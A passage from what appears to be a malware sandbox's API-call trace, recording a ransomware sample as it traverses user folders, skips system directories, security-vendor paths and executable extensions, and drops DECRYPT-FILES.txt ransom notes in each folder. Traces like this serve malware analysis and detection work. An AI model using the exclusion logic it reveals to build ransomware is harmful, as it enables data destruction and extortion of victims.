lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0079.865] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0079.866] CloseHandle (hObject=0x454) returned 1 [0079.866] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0079.866] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0079.866] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0079.866] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.866] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.867] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.867] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.867] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabcbe900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.867] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.867] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabcbe900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.867] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.867] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.867] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.867] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.867] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.867] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0079.867] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.867] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0079.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\jkbimi8.tmp" [0079.867] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.868] CloseHandle (hObject=0x0) returned 0 [0079.868] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.868] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabcbe900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0079.868] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0079.868] CloseHandle (hObject=0x450) returned 1 [0079.868] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0079.872] lstrcmpW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0079.872] lstrcmpW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0079.872] lstrcatW (in: lpString1="Printer Shortcuts", lpString2="\\" | out: lpString1="Printer Shortcuts\\") returned="Printer Shortcuts\\" [0079.873] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Printer Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Program Files") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch=":\\Windows") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Games\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\All Users") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="AhnLab") returned 0x0 [0079.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.873] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0079.873] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.873] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\jkbimi8.tmp") returned 94 [0079.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0079.883] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0079.883] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.883] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt") returned 100 [0079.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0079.884] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0079.885] CloseHandle (hObject=0x454) returned 1 [0079.886] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0079.886] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0079.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabce4a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0079.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.886] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabce4a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.886] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabce4a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.886] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.886] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabce4a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabce4a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.886] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.887] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.887] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.887] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.887] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.887] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.887] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.887] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0079.887] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.887] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0079.887] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\jkbimi8.tmp" [0079.887] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.887] CloseHandle (hObject=0x0) returned 0 [0079.887] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.888] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabce4a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabce4a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0079.888] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0079.888] CloseHandle (hObject=0x450) returned 1 [0079.888] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x94fde710, ftLastAccessTime.dwHighDateTime=0x1d2fab5, ftLastWriteTime.dwLowDateTime=0x94fde710, ftLastWriteTime.dwHighDateTime=0x1d2fab5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0079.888] lstrcmpW (lpString1="PrivacIE", lpString2=".") returned 1 [0079.888] lstrcmpW (lpString1="PrivacIE", lpString2="..") returned 1 [0079.888] lstrcatW (in: lpString1="PrivacIE", lpString2="\\" | out: lpString1="PrivacIE\\") returned="PrivacIE\\" [0079.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="PrivacIE\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Program Files") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch=":\\Windows") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Games\\") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\All Users") returned 0x0 [0079.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="AhnLab") returned 0x0 [0079.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0079.889] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.889] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\jkbimi8.tmp") returned 85 [0079.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0079.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0079.889] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.889] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt") returned 91 [0079.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0079.891] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0079.892] CloseHandle (hObject=0x454) returned 1 [0079.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0079.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0079.893] FindFirstFileW (in: 